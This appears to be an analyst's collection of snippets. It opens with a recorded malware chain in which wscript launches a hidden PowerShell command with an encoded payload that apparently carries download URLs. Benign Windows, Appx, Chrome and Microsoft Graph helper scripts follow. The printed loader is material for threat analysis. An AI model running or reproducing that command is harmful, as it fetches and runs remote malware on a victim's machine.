wscript -> powershell -> .dll
"C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\Uwgulbom.js"
"C:\Windows\System32\wscript.exe" "C:\Users\admin\Desktop\Uwgulbom.js" seroplasticGodchild bankweedPolycratic unmiserly becassockedUndividedness
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABjAGEAbAB1AG0AbgBpAGEAdABlAGQARgBvAG8AbABoAGEAcgBkAGkAZQBzAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBkAEEAQgBvAEEARwA4AEEAYwBnAEIAdQBBAEMANABBAGIAZwBCAGgAQQBHAGMAQQBiAHcAQgA1AEEARwBFAEEAegBUAFAAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBQAEEASABVAEEAZABBAEIAbQBBAEcAawBBAFoAUQBCAHMAQQBHAFEAQQBaAFEAQgB5AEEASABNAEEATABnAEIAeQBBAEcAVQBBAGIAZwBCADAAQQBHAEUAQQBiAEEAQgB6AEEAQQA9AD0AegBUAFAAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB3AEEARwA4AEEAYgBBAEIANQBBAEcATQBBAGEAQQBCAGgAQQBHAFUAQQBkAEEAQgB2AEEASABVAEEAYwB3AEEAdQBBAEgAYwBBAGIAdwBCAHkAQQBHAHcAQQBaAEEAQQA9ACIAOwAk
#!/bin/bash
tar xvf example.ova
qemu-img convert -O qcow2 example.vmdk example.qcow2
# Set Dark Mode
Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize -Name AppsUseLightTheme -Value 0
Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize -Name SystemUsesLightTheme -Value 0
# Taskbar preferences
Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced -Name TaskbarAl -Value 0 # Align Left
Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced -Name TaskbarDa -Value 0 # Hide Widgets
Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced -Name TaskbarMn -Value 0 # Hide Chat
Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced -Name ShowTaskViewButton -Value 0 # Hide TaskView
Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Search -Name SearchBoxTaskbarMode -Value 0 # Hide SearchBox
#!/bin/bash
# hacky one-liner to extract all hardcoded user agents from GraphRunner
curl -s https://raw.githubusercontent.com/dafthack/GraphRunner/main/GraphRunner.ps1 | grep '$UserAgent =' | grep -v 'Invoke' | awk '{ gsub(/\$UserAgent = /, ""); $1=$1; print }' | sed 's/"//g' | sed "s/'//g"
Scenario: You only have the AppxBlockMap.xml from a potentially malicious Appx. You'd like to identify the original PE contained in the Appx.
AppxBlockMap.xml lists the files contained in an Appx bundle together with their hashes. Each file is described by a <File></File> XML
block. You can search for the string <File Name= to see each file, or search directly for the relevant .exe. The file hash is the
last element of the block (<b4:FileHash>) and is base64 encoded.
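The lookup described above, as an added example that is not part of the original page: a small Python parser that walks the <File> entries, reads the base64 <b4:FileHash> and renders it as hex so it can be compared with the hash of a candidate PE. The sample block map and its namespace URIs are constructed and assumed, not taken from a real package; the parser matches on local element names so it does not depend on the exact namespace.

```python
import base64
import xml.etree.ElementTree as ET

# Constructed sample AppxBlockMap.xml (not from a real package). The namespace
# URIs are assumed from the Appx block map schema; the parser matches on local
# element names, so a different prefix or namespace still works.
SAMPLE_BLOCKMAP = """<?xml version="1.0" encoding="UTF-8"?>
<BlockMap xmlns="http://schemas.microsoft.com/appx/2010/blockmap"
          xmlns:b4="http://schemas.microsoft.com/appx/2015/blockmap"
          HashMethod="http://www.w3.org/2001/04/xmlenc#sha256">
  <File Name="AppxManifest.xml" Size="1234" LfhSize="45">
    <Block Hash="3vN0dZ8c3K0p2m5p1JzL7Z0Gq3n1cF8hJ9k2L3m4N5o="/>
    <b4:FileHash>47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=</b4:FileHash>
  </File>
  <File Name="Setup\\Installer.exe" Size="98765" LfhSize="49">
    <Block Hash="Q2xvdWRGbGFyZUJsb2NrMQ=="/>
    <b4:FileHash>ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0=</b4:FileHash>
  </File>
</BlockMap>
"""

def _local(tag: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on qualified tags."""
    return tag.rsplit("}", 1)[-1]

def parse_blockmap(xml_text: str) -> dict[str, str]:
    """Map each File Name to its whole-file hash as lowercase hex.

    Only the base64 <b4:FileHash> child is used; the per-block
    <Block Hash=...> values are ignored.
    """
    root = ET.fromstring(xml_text)
    result = {}
    for file_el in root.iter():
        if _local(file_el.tag) != "File":
            continue
        name = file_el.get("Name")
        hash_el = next((c for c in file_el if _local(c.tag) == "FileHash"), None)
        if name is None or hash_el is None or not hash_el.text:
            continue  # file entry without a whole-file hash: nothing to pivot on
        result[name] = base64.b64decode(hash_el.text.strip()).hex()
    return result

def pe_hashes(xml_text: str) -> dict[str, str]:
    """Only the entries that look like PE files (.exe/.dll), the usual pivot."""
    return {n: h for n, h in parse_blockmap(xml_text).items()
            if n.lower().endswith((".exe", ".dll"))}
```

The hex value from pe_hashes can then be compared against the SHA-256 of any PE you suspect was in the package.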
#!/bin/bash
cat '/Users/<username>/Library/Application Support/Google/Chrome/Default/Extensions/'*/*/manifest.json | jq -r '.name' | grep -v __MSG
import requests
import sys
import json

MS_GRAPH_API_BASE_URL = "https://graph.microsoft.com"

if __name__ == "__main__":
    if sys.stdin is not None:
        # read the access token from the first line of stdin
        access_token = sys.stdin.readline().rstrip()
import urllib.request
import urllib.parse
import urllib.error

def urlreq(method: str, url: str, headers: dict | None = None, data: dict | None = None) -> str:
    # no mutable default for headers; build a fresh dict per call
    headers = headers or {}
    encoded_data = None
    if data is not None:
        if method == "GET":
            # urlencode data as query parameters appended to the URL
            params = "&".join(
                f"{urllib.parse.quote(str(k))}={urllib.parse.quote(str(v))}" for k, v in data.items()
            )
            url = f"{url}{'&' if '?' in url else '?'}{params}"
        else:
            # otherwise send the data form-encoded in the request body
            encoded_data = urllib.parse.urlencode(data).encode()
    req = urllib.request.Request(url, data=encoded_data, headers=headers, method=method)
    with urllib.request.urlopen(req) as resp:
        return resp.read().decode()
#!/bin/bash
# pre-consented first-party Microsoft apps with registered service principals
mgc service-principals list --all --filter "appOwnerOrganizationId eq f8cdef31-a31e-4b4a-93e4-5f571e91255a" --count true --consistency-level eventual --select id,displayName
CSV of pre-consented first-party applications listed via the servicePrincipals endpoint.
The list (microsoft-first-party-applications.csv) can be generated via:
mgc service-principals list --all --filter "appOwnerOrganizationId eq f8cdef31-a31e-4b4a-93e4-5f571e91255a" --count true --consistency-level eventual --select appId,displayName | jq -r '.value[] | [.appId, .displayName] | @csv'
This list is more extensive, but it is missing entries compared to the Microsoft Documentation page "Verify first-party Microsoft applications in sign-in reports". The applications from that page are captured in applications-from-docs.csv.